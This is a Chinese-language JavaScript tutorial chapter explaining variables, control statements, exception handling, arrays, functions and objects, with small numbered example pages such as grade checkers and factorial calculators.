在JavaScript中,使用一个变量之前应先声明。变量是用关键字var来声明的,例如:
var i,j; //通过一个var声明多个变量
var i=0,j=0; //可以将变量的初始赋值和变量声明合写在一起
变量的作用域:
• 全局变量:声明在函数外部的变量
• 局部变量:声明在函数内部的变量。函数内声明的所有变量在函数体内始终是可见的。这意味着变量在声明之前甚至已经可见。JavaScript的这个特性被非正式地称为声明提前(hoisting),例如:
var scope="global";
function f() {
console.log(scope); //输出“undefined”,而不是“global”
var scope="local"; //变量在这里赋初始值,但变量本身在函数体内任何地方均是有定义的
console.log(scope); //输出“local”
}
赋值
赋值表达式:JavaScript使用“=”运算符来给变量或者属性赋值。
带操作的赋值运算:
运算符 示例 等价于
+= a+=b a=a+b
-= a-=b a=a-b
*= a*=b a=a*b
/= a/=b a=a/b
%= a%=b a=a%b
^= a^=b a=a^b
语句
条件语句
通过判断指定表达式的值来决定执行还是跳过某些语句。JavaScript中基本的条件语句有2种:
• if语句,其有两种形式:
// 1
if (条件)
语句1;
[else
语句2;]
//2
if (条件){
语句块1;
}
[else{
语句块2;
}]
chap3-1.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>chap3-1</title>
</head>
<body>
<form>
<span>The Grade:</span><input type="text" id="Grade">
</form>
<script>
document.getElementById("Grade").onkeydown=function (e) {
if(e.keyCode==13){
if(e.target.value>=60)
alert("成绩及格");
else
alert("成绩不及格");
}
}
</script>
</body>
</html>
• switch语句,其形式为:
switch (expression){
case e1: //如果expression==e1,则执行语句块1
语句块1;
break; //停止执行switch语句
case e2: //如果expression==e2,则执行语句块2
语句块2;
break;
case en: //如果expression==en,则执行语句块n
语句块n;
break;
default: //如果所有的条件都不匹配,则执行语句块n+1
语句块n+1;
break;
}
chap3-2.html
<body><form><span>The Grade:</span><input type="text" id="Grade"></form>
<script>document.getElementById("Grade").onkeydown=function (e) {
if(e.keyCode==13){
var Grank=Math.floor(document.getElementById("Grade").value/10);
switch (Grank){
case 10:
alert("优秀");
break;
case 9:
alert("优秀");
break;
case 8:
alert("良好");
break;
case 7:
alert("中等");
break;
case 6:
alert("及格");
break;
default:
alert("不及格");
break;
}}} </script></body>
循环语句
可以让一部分代码重复执行。JavaScript中有4种循环语句:
• while语句
// 1
while (条件)
语句;
// 2
while (条件){
语句块;
}
chap3-3.html
<body>
<form>
<span>阶乘:</span><input type="text" id="jc">
</form>
<script>
var o=document.getElementById("jc");
o.onkeydown=function (e) {
if(e.keyCode==13){
var m=n=o.value;
var result=1;
while(n>0){
result*=n;
n=n-1;
}
alert(m+"!="+result);
}
}
</script>
</body>
</html>
• do/while语句
// 1
do
语句;
while(条件);
// 2
do{
语句块;
}while(条件);
chap3-4.html
<body>
<form>
<span>阶乘:</span><input type="text" id="jc">
</form>
<script>
var o=document.getElementById("jc");
o.onkeydown=function (e) {
if(e.keyCode==13){
var m=n=o.value;
var result=1;
do{
result*=n;
n--;
}while(n>0);
alert(m+"!="+result);
}
}
</script>
</body>
• for语句
for(initialize;test;increment){
statements;
}
chap3-5.html
<body>
<form>
<span>阶乘:</span><input type="text" id="jc">
</form>
<script>
var o=document.getElementById("jc");
o.onkeydown=function (e) {
if(e.keyCode==13){
var m=o.value;
var result=1;
for(var i=1;i<=m;i++){
result*=i;
}
alert(m+"!="+result);
}
}
</script>
</body>
• for/in语句
for(variable in object){
statements;
}
chap3-6.html
<script>
var a="1,2,3,4,5";
var arr=a.split(",");
var sum=0;
for(var i in arr){
sum+=Number(arr[i]);
}
alert(a+"中值的和为:"+sum);
</script>
跳转语句
可以使得JavaScript的执行从一个位置跳转到另一个位置。
• break语句是跳转到循环或者其他语句的结束。
• continue语句是终止本次循环的执行并开始下一次循环的执行。
chap3-7.html
<script>
var sumb=sumc=0;
for(var i=1;i<=100;i++){
sumb+=i;
if(i==50)
break;
}
for(var i=1;i<=100;i++){
if(i==50)
continue;
sumc+=i;
}
alert("break的结果:"+sumb+"\n"+"continue的结果:"+sumc);
</script>
标签语句
标签是由语句前的标识符和冒号组成:identifier:statement
通过给语句定义标签,就可以在程序的任何地方通过标签名引用这条语句。breakcontinue是JavaScript中唯一可以使用语句标签的语句。
break|continue identifier;
mainloop: while(j<=100){
j++;
continue mainloop; //跳转到下一次循环
}
alert("j的值为:"+j);
mainloop: while(j<=100){
j++;
break mainloop;
}
alert("j的值为:"+j); //break语句跳转至此处
注意:不管continue语句带不带标签,它只能在循环体内使用。
return语句
可以指定函数调用后的返回值。return expression;
function squre(x) {
return x*x;
}
document.writeln("2的平方等于:"+squre(2)+"<br>");
异常处理语句
所谓异常(exception)是当发生了某种异常情况或错误时产生的一个信号。抛出异常就是用信号通知发生了错误或异常情况。捕获异常是指处理这个信号,即采取必要的手段从异常中恢复。
throw语句可以抛出异常:throw expression;
try/catch/finally语句可以捕获异常:
try{
//通常来讲,这里的代码会从头执行到尾而不会产生问题,但有时会抛出一个异常,要么是由throw语句直接抛出异常,要么是通过调用一个方法间接抛出异常
}
catch(e){
//当且仅当try语句块抛出了异常,才会执行这里的代码。这里可以通过局部变量e来获得对Error对象或者抛出的其它值的引用,这里的代码块可以基于某种原因处理这个异常,也可以忽略这个异常,还可以通过throw语句重新抛出异常。
}
finally{
/*不管try语句块是否抛出了异常,这里的逻辑总是会执行,终止try语句块的方式有:
1)正常终止,执行完语句块的最后一条语句
2)通过break、continue或return语句终止
3)抛出一个异常,异常被catch从句捕获
4)抛出一个异常,异常未被捕获,继续向上传播
*/
}
chap3-8.html
<script>
function jc(x) {
if(x<0||x>10) throw new Error("x的值不能为负");
for(var res=1;x>1;res*=x,x--);
return res;
}
var grade=Number(prompt("请输入一个正整数:",""));
try{
alert(grade+"!="+jc(grade));
}
catch (e){
alert(e);
var grade=Number(prompt("请输入一个正整数:",""));
if(grade>10) throw new Error("x的值不能超过10");
alert(grade+"!="+jc(grade));
}
finally {
alert("x的范围为1-10之间");
}
</script>
数组
数组是值的有序集合。每个值叫做一个元素,而每个元素在数组中有一个位置,以数字表示,称为索引。
JavaScript数组是无类型的:数组元素可以是任意类型,并且同一个数组中的不同元素也可能有不同的类型。
创建
创建数组有2种方式:
• 数组直接量:
var empty=[]; //没有元素的数组
var primes=[1,2,3,4,5]; //有5个数值的数组
var misc=[1.1,true,"a"]; //3个不同类型的元素
var base=1024;
var table=[base,base+1,base+2]; //值可以是表达式
var b=[{x:1,y:2},primes]; //值还可以对象或其它数组
如果省略数组直接量中的某个值,省略的元素将被赋予undefined值:
var count=[1,,3]; //数组有3个元素,中间的那个元素值为undefined
var undefs=[,,]; //数组有2个元素,都是undefined
数组直接量的语法允许有可选的结尾的逗号,故[,,]只有两个元素,而非三个。
• 调用构造函数Array(),其有2种形式:
• 调用时没有参数:var a=new Array();
该方法创建一个没有任何元素的空数组,等同于数组直接量[]
• 调用时有一个数值参数,它指定长度:var a=new Array(10);
当预先知道所需元素个数时,这种形式的Array()构造函数可以用来预分配一个数组空间。此时数组中没有存储值,甚至数组的索引属性“0”、“1”等还未定义。
我们可以用new Array()显示指定两个或多个数组元素或者数组的一个非数值元素:
var a=new Array(5,4,"testing");
读写
数组元素的读与写:使用[]操作符来访问数组中的一个元素。
var a=["hello"]; //从一个元素的数组开始
var value=a[0]; //读第0个元素
a[1]=3.14; //写第1个元素
i=2;
a[i]=3; //写第2个元素
document.write(a.length);
JavaScript中数组的特别之处在于,当使用小于232的非负整数作为索引时,数组会自动维护其length属性值,如上,创建仅有一个元素的数组,然后在索引12处分别进行赋值,则数组的长度变为3
注意:JavaScript中数组索引仅仅是对象属性名的一种特殊类型,这意味着数组没有“越界”错误的概念。当试图查询对象中不存在的属性时,不会报错,只会得到undefined值。
稀疏数组
就是包含从0开始的不连续索引的数组。稀疏数组length属性大于元素的个数。可以用Array()构造函数或简单地指定数组的索引值大于当前的数组长度来创建稀疏数组。
a=new Array(5); //数组没有元素,但是a.length是5
a[1000]=0; //赋值添加一个元素,但是设置length为1001
足够稀疏的数组通常在实现上比稠密的数组更慢,内存利用率更高,在这样的数组中查找元素的时间更长。
元素的添加
数组元素的添加有3种方式:
• 为新索引赋值:
var a=[]; //开始是一个空数组
a[0]="zero"; //然后向其中添加元素
a[1]="one";
• 使用push()方法在数组末尾添加一个或多个元素:
var a=[]; //开始是一个空数组
a.push("zero"); //在末尾添加一个元素
a.push("one","two"); //在末尾添加两个元素
• 使用unshift()方法在数组头部添加一个或多个元素:
var a=[]; //开始是一个空数组
a.unshift("two"); //在头部添加一个元素
a.unshift("zero","one"); //在头部添加两个元素
元素的删除
数组元素的删除有3种方式:
• 使用delete运算符删除:
对一个数组使用delete不会修改数组的length属性,也不会将元素从高索引处移下来填充已删除属性留下的空白。
var a=[1,2,3];
delete a[1]; //a在索引1的位置不再有元素
• 使用pop()方法删除数组末尾的元素:
该方法减少数组的长度。
var a=[1,2,3];
a.pop(); //删除a尾部的元素
• 使用shift()方法在数组头部删除一个或多个元素:
该方法减少数组的长度,并将所有随后的元素下移一个位置来填补数组头部的空缺。
var a=[1,2,3];
a.shift(); //删除a头部的元素
多维数组
JavaScript不支持真正的多维数组,但可以用数组的数组来近似。
chap3-9.html
<head><style>
span{display: inline-block;width: 80px;height: 60px;font-size: xx-large}</style>
</head>
<body>
<script>
var table=new Array(10); //表格有10行
for(var i=0;i<table.length;i++)
table[i]=new Array(10); //每行有10列
//初始化数组
for(var row=0;row<table.length;row++){
for(var col=0;col<table[row].length;col++){
table[row][col]=row*col;
}
}
//输出数组元素值
for(var row=0;row<table.length;row++){
for(var col=0;col<table[row].length;col++){
document.write("<span>"+table[row][col]+"</span>");
}
document.write("<br>");
}
</script>
</body>
数组方法
join():将数组中所有元素都转化为字符串并连接在一起,返回最后生成的字符串。可以指定一个可选的字符串在生成的字符串中来分隔数组的各个元素。如果不指定分隔符,默认使用逗号。
var a=[1,2,3]; //创建一个包含三个元素的数组
var str=a.join(); //str的值为“1,2,3”
str=a.join(" "); //str的值为“1 2 3”
reverse():将数组中的元素颠倒顺序,返回逆序的数组。
var a=[1,2,3]; //创建一个包含三个元素的数组
a.reverse();
for(var i=0;i<a.length;document.write(a[i]+"<br>"),i++);
sort():将数组中的元素排序并返回排序后的数组,语法为:arrayObject.sort([sortby])
• 如果调用该方法时没有使用参数,将按字母顺序对数组中的元素进行排序,说得更精确点,是按照字符编码的顺序进行排序。
var a=["banana","cherry","apple"];
a.sort();
for(var i=0;i<a.length;document.write(a[i]+"<br>"),i++);
var b=[33,4,1111,222];
b.sort(); //输出结果:1111 222 33 4
for(var i=0;i<b.length;document.write(b[i]+"<br>"),i++);
• 如果想按照其他标准进行排序,就需要提供比较函数(sortby),该函数要比较两个值,然后返回一个用于说明这两个值的相对顺序的数字。比较函数应该具有两个参数ab,其返回值如下:
• a小于b,在排序后的数组中a应该出现在b之前,则返回一个小于0的值。
• a等于b,则返回0
• a大于b,则返回一个大于0的值。
chap3-10.html
<script>
var a=["banana","cherry","apple"];
a.sort();
for(var i=0;i<a.length;document.write(a[i]+"<br>"),i++);
var b=[33,4,1111,222];
b.sort(); //输出结果:1111 222 33 4
for(var i=0;i<b.length;document.write(b[i]+"<br>"),i++);
b.sort(function (m,n) {
return m-n; //按由小到大的顺序排列
});
for(var i=0;i<b.length;document.write(b[i]+"<br>"),i++);
</script>
concat():创建并返回一个新数组,它的元素包括调用concat()的原始数组的元素和concat()的每个参数。如果这些参数中的任何一个自身是数组,则连接的是数组的元素,而非数组本身。
注意:concat()不会递归扁平化数组的数组。concat()也不会修改调用的数组。
chap3-11.html
<head>
<meta charset="UTF-8">
<title>chap3-11</title>
<style>
span{display: inline-block;width: 80px;height: 60px;font-size: xx-large}
span#s1{display: block}
</style>
</head>
<body>
<script>
var a=[1,2,3];
var b=a.concat(4,5); //返回[1,2,3,4,5]
b=a.concat([4,5],[6,7]); //返回[1,2,3,4,5,6,7]
b=a.concat([4,[5,[6,7]]]); //返回[1,2,3,4,[5,[6,7]]]
for(var i=0;i<b.length;i++){
if(Array.isArray(b[i]))
for(var j=0;j<b[i].length;document.write("<span>"+b[i][j]+"</span>"),j++);
else
document.write("<span id='s1'>"+b[i]+"</span>");
}
</script>
</body>
slice()方法返回一个新的数组,包含从start到end (不包括该元素)的arrayObject中的元素。其语法格式为:
arrayObject.slice(start,end)
• start:必需。规定从何处开始选取。如果是负数,那么它规定从数组尾部开始算起的位置。也就是说,-1指最后一个元素,-2指倒数第二个元素,以此类推。
• end:可选。规定从何处结束选取。该参数是数组片断结束处的数组下标。如果没有指定该参数,那么切分的数组包含从start到数组结束的所有元素。如果这个参数是负数,那么它规定的是从数组尾部开始算起的元素。
var a=[1,2,3,4,5];
document.write(a.slice(0,3)+"<br>"); //返回[1,2,3]
document.write(a.slice(3)+"<br>"); //返回[4,5]
document.write(a.slice(1,-1)+"<br>"); //返回[2,3,4]
splice()方法向/从数组中添加/删除项目,然后返回被删除的项目。其语法格式为:
arrayObject.splice(index,howmany,item1,.....,itemX)
• index:必需。整数,规定添加/删除项目的位置,使用负数可从数组结尾处规定位置。
• howmany:必需。要删除的项目数量。如果设置为0,则不会删除项目。
• item1,…,itemX:可选。向数组添加的新项目。
• splice()方法可删除从index处开始的零个或多个元素,并且用参数列表中声明的一个或多个值来替换那些被删除的元素。
• 如果从arrayObject中删除了元素,则返回的是含有被删除的元素的数组。
chap3-12.html
<script>
var a=[1,2,3,4,5];
document.write(a.slice(0,3)+"<br>"); //返回[1,2,3]
document.write(a.slice(3)+"<br>"); //返回[4,5]
document.write(a.slice(1,-1)+"<br>"); //返回[2,3,4]
a.splice(2,0,6);
document.write(a+"<br>"); //返回[1,2,6,3,4,5]
a.splice(2,1);
document.write(a+"<br>"); //返回[1,2,3,4,5]
a.splice(2,1,6);
document.write(a+"<br>"); //返回[1,2,6,4,5]
a.splice(2,3,3);
document.write(a+"<br>"); //返回[1,2,3]
a.splice(3,0,4,5);
document.write(a+"<br>"); //返回[1,2,3,4,5]
</script>
函数
函数是这样的一段JavaScript代码,它只定义一次,但可能被执行或调用任意次。
JavaScript函数是参数化的:函数的定义会包括一个称为形参(parameter)的标识符列表,这些参数在函数体中像局部变量一样工作。函数调用会为形参提供实参(argument)的值。函数使用它们实参的值来计算返回值,成为该函数调用表达式的值。
除了实参之外,每次调用还会拥有另一个值,即本次调用的上下文(context),这就是this关键字的值。如果函数挂载在一个对象上,作为对象的一个属性,就称它为对象的方法。当通过这个对象来调用函数时,该对象就是此次调用的上下文,也就是该函数的this的值。
JavaScript的函数可以嵌套在其他函数中定义,这样就构成了一个闭包(closure)。
定义
函数使用function关键字来定义,它可以用在:
• 函数声明语句
在函数声明语句中:
• function关键字后的函数名称是函数声明语句必需的部分。
• 一对圆括号,其中包含由0个或者多个用逗号隔开的形参组成的列表。
• 一对花括号,其中包含0条或多条JavaScript语句。
这些语句构成了函数体,一旦调用函数,就会执行这些语句。
function jc(x) {
var result=1;
for(var i=1;i<=x;i++){
result*=i;
}
return result;
}
var a=Number(prompt("请输入一个正整数:",""));
document.write(jc(a)+"<br>");
• 函数定义表达式
对于函数定义表达式来说,函数名称是可选的,如果存在,该名字只存在于函数体中,并指代该函数对象本身。
var square=function(x) {return x*x;}; //定义时函数名称省略
document.write(square(a)+"<br>"); //调用时使用变量名称(实参)形式
var f=function fact(x) { //定义时可以包含函数名称
if (x<=1)
return 1;
else
return x*fact(x-1);
}
document.write(f(a)+"<br>"); //调用时使用变量名称(实参)形式
如同变量,函数声明语句“被提前”到外部脚本或外部函数作用域的顶部,所以以这种方式声明的函数,可以被在它定义之前出现的代码所调用。
但是,对于函数定义表达式而言,就另当别论了,为了调用一个函数,必须要能引用它,而要使用一个以表达式方式定义的函数之前,必须把它赋值给一个变量。变量的声明提前了,但给变量赋值是不会提前的,所以,以表达式方式定义的函数在定义之前无法调用。
chap3-13.html
<script>
var a=Number(prompt("请输入一个正整数:",""));
document.write(jc(a)+"<br>");
function jc(x) {
var result=1;
for(var i=1;i<=x;i++){
result*=i;
}
return result;
}
var square=function(x) {return x*x;}; //定义时函数名称省略
document.write(square(a)+"<br>"); //调用时使用变量名称(实参)形式
var f=function fact(x) { //定义时可以包含函数名称
if (x<=1)
return 1;
else
return x*fact(x-1);
}
document.write(f(a)+"<br>"); //调用时使用变量名称(实参)形式
</script>
调用
有4种方式来调用JavaScript函数:
• 作为函数调用:var a=jc(10);
• 作为方法调用:var b=Math.floor(3.2);
方法调用和函数调用有一个重要的区别,即:调用上下文。this关键字只能出现在函数中,当然在全局作用域中是个例外。
全局作用域中this指向全局对象(全局对象在浏览器这个环境中指window)。
如果this出现在函数中,其指向的依据就是函数的执行环境而不是声明环境。换句话说,this永远指向所在函数的所有者,当没有显示的所有者的时候,那么this指向全局对象。
各种情况下的this的具体指向:
• 在全局作用域中this指向为全局对象windowdocument.write(this+ "<br>");
• 函数作为某个对象的成员方法调用时this指向该对象。
chap3-14.js
var name="zhangsan";
var obj={
name:"lizi",
getName:function () {
document.write(this.name + "<br>");
}
}
obj.getName(); //输出lizi
• 函数作为函数直接使用时this指向全局对象。
chap3-14.js
var name="zhangsan";
var obj={
name:"lizi",
getName:function () {
document.write(this.name + "<br>");
}
}
var nameGet=obj.getName;
nameGet(); //输出zhangsan
• 函数作为构造函数调用时this指向用该构造函数构造出来的新对象。
chap3-14.js
var name="zhangsan";
var obj1=function (x,y) {
this.name=x+y;
}
obj1.prototype.getName=function () {
document.write(this.name + "<br>");
}
var myObj=new obj1("wang","er");
myObj.getName(); //输出wanger
• call()apply()bind()方法可以改变函数执行时候的this指向。
function Sister() {
this.age=18;
this.sayAge=function () {document.write("Age:"+this.age+ "<br>");}
}
function Brother() {
this.age=25;
this.sayAge=function () {document.write("Age:"+this.age+ "<br>");}
}
var sis=new Sister();
var bro=new Brother();
sis.sayAge.call(bro); //输出"Age:25"
• 作为构造函数调用
如果函数或者方法调用之前带有关键字new,它就构成构造函数调用。var myObj=new obj1("wang","er");
构造函数调用创建和初始化一个新的对象myObj,并将这个对象用做其调用上下文,因此构造函数可以使用this关键字来引用这个新创建的对象。myObj对象继承自构造函数的prototype属性。
• 间接调用
call()apply()方法可以看做是某个对象的方法,通过调用方法的形式来间接调用函数。
他们的用途相同,都是在特定的作用域中调用函数。
接收参数方面不同,apply()接收两个参数,一个是函数运行的作用域(this),另一个是参数数组。call()方法第一个参数与apply()方法相同,但传递给函数的参数必须列举出来。
chap3-14.js
window.firstName="San";
window.lastName="Zhang";
var myObject={firstName:"my",lastName:"Object"};
function HelloName() {document.write(this.firstName+" "+this.lastName+ "<br>");}
HelloName.call(window); //输出"San Zhang"
HelloName.call(this); //输出"San Zhang"
HelloName.call(myObject); //输出"my Object"
function sum(m,n) {
return m+n;
}
document.write(sum.call(window,10,10)+ "<br>"); //输出20
document.write(sum.apply(window,[10,20])+ "<br>"); ////输出30
实参和形参
JavaScript中的函数定义并未指定函数形参的类型,函数调用也未对传入的实参值做任何类型检查。实际上,JavaScript函数调用甚至不检查传入形参的个数。
可选形参:当调用函数的时候传入的实参比形参个数少时,剩下的形参都将设置为undefined值。因此在调用函数时形参是否可选以及是否可以省略应当保持较好的适应性。为了做到这一点,应当给省略的参数赋一个合理的默认值。
• 注意:当用这种可选形参来实现函数时,需要将可选形参放在形参列表的最后。
chap3-15.js
function int(x,type) {
if(type===undefined) return Math.floor(x);
if(type===1) return Math.floor(x);
if(type===2) return Math.ceil(x);
if(type===3) return Math.round(x);
}
document.write("3.4默认去尾法取整:" +int(3.4)+"<br>");
document.write("3.4去尾法取整:" +int(3.4,1)+"<br>");
document.write("3.4进位法取整:" +int(3.4,2)+"<br>");
document.write("3.4四舍五入取整:" +int(3.4,3)+"<br>");
可变长的实参列表(实参对象):当调用函数的时候传入的实参个数超过函数定义时的形参个数时,没有办法直接获得未命名值的引用。参数对象解决了这个问题。
• 实参对象有一个重要的用处就是:让函数可以操作任意数量的实参。
• 假设定义了函数f,它的形参只有一个x。如果调用f时传入两个实参,第一个实参可以通过形参名x来获得,也可以通过arguments[0]来得到;第二个实参只能通过arguments[1]来得到。此外,和数组一样,arguments.length属性返回实参的个数。
• 注意:arguments不是数组,它是一个实参对象。每个实参对象都包含以数字为索引的一组元素以及length属性。
chap3-15.js
function max() {
var max=Number.NEGATIVE_INFINITY; //NEGATIVE_INFINITY 表示负无穷大
for(var i=0;i<arguments.length;i++){
if(arguments[i]>max) max=arguments[i];
}
return max;
}
var largest=max(1,10,100,2,3,1000,4,5,10000,6);
document.write("最大值为:"+largest+"<br>");
将对象属性用做实参:当一个函数包含超过三个形参时,对于程序员来说,要记住调用函数中实参的正确顺序很难。最好通过名/值对的形式来传入参数,这样参数的顺序就无关紧要了。为了实现这种风格的方法调用,定义函数时,传入的实参都写入一个单独的对象中,在调用的时候传入一个对象,对象中的名/值对是真正需要的实参数据。
chap3-15.js
function arraycopy(from,from_start,to,to_start,length) {
for(var i=to_start;i<to_start+length;i++){
to[i]=from[from_start+i-to_start];
}
}
function easycopy(args) {
arraycopy(args.from,
args.from_start||0, //这里设置了默认值
args.to,
args.to_start||0, //这里设置了默认值
args.length
);
}
var a=[1,2,3,4],b=[5,6,7,8];
easycopy({from:a, to:b, to_start:2, length:4});
for(var i=0;i<b.length;i++){document.write(b[i]+"<br>");}
作为值的函数
在JavaScript中,函数不仅是一种语法,也是值,也就是说,可以将函数赋值给变量。
chap3-16.js
function squre(x) {return x*x;}
var s=squre; //现在s和squre指代同一个函数
document.write(squre(4)+"<br>");
document.write(s(4)+"<br>");
除了可以将函数赋值给变量,同样可以将函数赋值给对象的属性。
chap3-16.js
var o={square:squre};
var x=o.square(16);
document.write(x+"<br>");
函数甚至不需要带名字,当把它们赋值给数组元素时:
chap3-16.js
var a=[function (x) {return x*x},20];
document.write(a[0](a[1])+"<br>");
作为命名空间的函数
JavaScript中变量的作用域有全局变量和局部变量2种。在JavaScript中是无法声明只在一个代码块内可见的变量的,基于这个原因,我们常常简单地定义一个函数用做临时的命名空间,在这个命名空间内定义的变量都不会污染到全局命名空间。
function mymodule() {
//模块代码,这个模块所使用的所有变量都是局部变量,而不是污染全局命名空间
}
mymodule(); //不要忘了还要调用这个函数
这段代码仅仅定义了一个单独的全局变量:名叫“mymodule”的函数。这样还是太麻烦,可以直接定义一个匿名函数,并在单个表达式中调用它:
(function () {
//模块代码
}()); //结束函数定义并立即调用它
闭包
出于种种原因,我们有时候需要得到函数内的局部变量。闭包可以捕捉到局部变量(和参数),并一直保存下来。闭包就是一个函数引用另外一个函数的变量,因为变量被引用着所以不会被回收,因此可以用来封装一个私有变量。这是优点也是缺点,不必要的闭包只会徒增内存消耗!
chap3-17.js
var scope="global scope"; //全局变量
function checkscope() {
var scope="local scope"; //局部变量
function f() {return scope;} //在作用域中返回这个值
return f();
}
var a=checkscope();
document.write(a+"<br>")
对象
对象是一种复合值,它将很多值聚合在一起,可通过名字访问这些值。对象也可看作是属性的无序集合,每个属性都是一个名/值对。属性名是字符串,因此我们可以把对象看成是从字符串到值的映射。
对象除了可以保持自有的属性外,还可以从一个称为“原型”的对象继承属性。
除了字符串、数字、truefalsenullundefined之外,JavaScript中的值都是对象。
除了包含属性之外,每个对象还拥有三个相关的对象特性:
对象的原型(prototype)指向另一个对象,本对象的属性继承自它的原型对象。
对象的类(class)是一个标识对象类型的字符串。
对象的扩展标记(extensible flag)指明了(在ECMAScript 5中)是否可以向该对象添加新属性。
JavaScript对象的类别
• 内置对象:是由ECMAScript规范定义的对象或类。例如,数组,函数,日期和正则表达式。
• 宿主对象:是由JavaScript解释器所嵌入的宿主环境(比如Web浏览器)定义的。客户端JavaScript中表示网页结构的HTMLElement对象均是宿主对象。
• 自定义对象:是由运行中的JavaScript代码创建的对象。
创建对象
创建对象(3种方式):
• 对象直接量:是由若干属性名/值
var empty={}; //空对象,没有任何属性
var point={x:0,y:0}; //两个属性
var book={
"main title":"JavaScript", //属性名字里有空格,必须用字符串表示
"sub-title":"The Definitive Guide", //属性名字里有连字符,必须用字符串表示
"for":"all audiences", //"for"是保留字,因此必须用引号
author:{ //这个属性的值是一个对象
firstname:"Shulin",
lastname:"Chen"
}
};
• 通过new创建对象:new关键字创建并初始化一个新对象,new后跟随一个函数调用。这里的函数称作构造函数。例如:
var author=new Object(); //创建一个空对象
author.firstname="Shulin";
author.lastname="Chen";
var mycars=new Array();
mycars[0]="Saab";
mycars[1]="Volvo";
var today = new Date(); //Date 对象自动使用当前的日期和时间作为其初始值。
• Object.create(proto[, propertiesObject]) 是ECMAScript 5中提出的一种新的对象创建方式,第一个参数是要继承的原型,也可以传一个null,第二个参数是对象的属性描述符,这个参数是可选的。例如:
var o1 = Object.create({x:1,y:2}); //o1继承了属性x和y
var o2 = Object.create(Object.prototype); //o2和{}以及new Object()一样,创建了一个普通的空对象
• 如果proto参数不是 null 或一个对象,则抛出一个 TypeError 异常。
• 在ECMAScript 3中可以用类似下面的代码来模拟原型继承:
chap3-18.js
//inherit()返回了一个继承自原型对象p的属性的新对象
//这里使用ECMAScript 5中的Object.create()函数(如果存在的话)
//如果不存在Object.create(),则退化使用其它方法
function inherit(p) {
if(p==null) throw TypeError(); //p是一个对象,但不能是null
if(Object.create) return Object.create(p); //如果Object.create()存在,直接使用它
var t=typeof p;
if(t!=="object" && t!=="function") throw TypeError();
function f() {}; //定义一个空构造函数
f.prototype=p; //将其原型属性设置为p
return new f(); //使用f()创建p的继承对象
}
//Inherit()函数的其中一个用途就是防止函数无意间(非恶意地)修改那些不受你控制的对象。
// 不是将对象直接作为参数传入函数,而是将它的继承对象传入函数。
//如果给继承对象的属性赋值,则这些属性只会影响这个继承对象自身,而不是原始对象。
var o={x:"don't change this value"};
changex(inherit(o));
function changex(obj) {
obj.x="hello world!";
document.write(obj.x+"<br>");
}
document.write(o.x+"<br>");
changex(o);
document.write(o.x+"<br>");
属性的查询和设置
JavaScript为属性访问定义了两种语法:
对象名.属性名对象名[表达式]
其中,表达式指定要访问的属性的名称或者代表要访问数组元素的索引。
对于点(.)来说,右侧必须是一个以属性名称命名的简单标识符(不能有空格、连字符等)。点运算符后的标识符不能是保留字,比如book.for是非法的,必须使用方括号的形式访问它们,比如book["for"]
对于方括号([])来说,方括号内必须是一个计算结果为字符串的表达式。其看起来更像数组,只是这个数组元素是通过字符串索引而不是数字索引。这种数组称为“关联数组”。
chap3-19.html
<script>
var book={
"main title":"JavaScript",
"sub-title":"The Definitive Guide",
"for":"all audiences",
author:{
firstname:"Shulin",
lastname:"Chen"
}
};
var a=[book,4,[5,6]];
document.write(book.author.firstname+"<br>"); //获得book对象中author的“firstname”属性
document.write(book["for"]+"<br>");
document.write(a[0]["main title"]+"<br>");
document.write(a[2][1]+"<br>");
book["main title"]="ECMAScript 6"; //给“main title”属性赋值
</script>
JavaScript对象具有自有属性(实例属性),也有一些属性是从原型对象继承而来的(继承属性)。
假设要查询对象q的属性x,如果q中不存在x,则会继续在q的原型对象中查询属性x,如果原型对象中也没有x,但这个原型对象也有原型,那么继续在这个原型对象的原型对象上执行查询,直到找到x或者查找到一个原型是null的对象为止。可以看到,对象的原型属性构成了一个“”,通过这个“”可以实现属性的继承。
chap3-20.html
<head>
<meta charset="UTF-8">
<title>chap3-20</title>
<script src="js/chap3.js"></script>
</head>
<body>
<script>
var o={}; //o从Object.prototype继承对象的方法
o.x=1; //给o定义一个属性x
var p=inherit(o); //p继承o和Object.prototype
p.y=2; //给p定义一个属性y
var q=inherit(p); //q继承p、o和Object.prototype
q.z=3; //给q定义一个属性z
document.write(q.x+q.y+q.z+"<br>");
</script>
</body>
假设给对象o的属性x赋值,如果o中已经有属性x(这个属性不是继承来的),那么这个赋值操作只改变这个已有属性x的值。如果o中不存在属性x,那么赋值操作给o添加一个新的属性x。如果之前o继承自属性x,那么这个继承的属性就被新创建的同名属性覆盖了。
属性赋值操作首先检查原型链,以此判定是否允许赋值操作。如果o继承自一个只读属性x,那么赋值操作是不允许的。如果允许属性赋值操作,它也总是在原始对象上创建属性或对已有的属性赋值,而不会去修改原型链。
chap3-20.js
var a={
get r(){return 1;},
x:1
};
var b=inherit(a); //b继承属性r
b.y=1; //b定义了个属性
b.x=2; //b覆盖继承来的属性x
b.r=3; //r为只读属性,赋值语句无效
document.write(b.r+"<br>"); //输出1
document.write(b.x+"<br>"); //输出2
document.write(a.x+"<br>"); //原型对象没有修改
删除属性
delete运算符可以删除对象的属性。它的操作数是一个属性访问表达式:
delete只是断开属性和宿主对象的联系,而不会去操作对象中的属性。
delete运算符只能删除自有属性,不能删除继承属性,要删除继承属性必须从定义这个属性的原型对象上删除它,而且这会影响到所有继承自这个原型的对象。
chap3-21.js
var book={
"main title":"JavaScript",
"sub-title":"The Definitive Guide",
"for":"all audiences",
author:{
firstname:"Shulin",
lastname:"Chen"
}
};
delete book.author; //book不再有属性author
delete book["main title"]; //book不再有属性"main title"
document.write(book.author+"<br>");
document.write(book["main title"]+"<br>");
var o=Object.create(book); //o继承了book对象的属性
delete o["for"]; //不能删除继承属性
document.write(book["for"]+"<br>");
检测属性
判断某个属性是否存在于某个对象中可以有3种方式:
in运算符:如果对象的自有属性或继承属性中包含这个属性,则返回true
hasOwnProperty()方法:对象的自有属性返回true,对于继承属性返回false
propertyIsEnumerable()方法:只有检测到是自有属性且这个属性的可枚举性为true时,它才返回true。某些内置属性是不可枚举的。
var o={x:1};
var obj=Object.create(o);
obj.y=2;
"x" in obj; //输出true
"y" in obj; //输出true
obj.hasOwnProperty("x"); //输出false
obj.hasOwnProperty("y"); //输出true
obj.propertyIsEnumerable("x"); //输出false
obj.propertyIsEnumerable("y"); //输出true
枚举属性
在JavaScript中,对象的属性分为可枚举和不可枚举之分,它们是由属性的enumerable值决定的。
JavaScript中基本包装类型的原型属性是不可枚举的,如Object, Array, Number等。
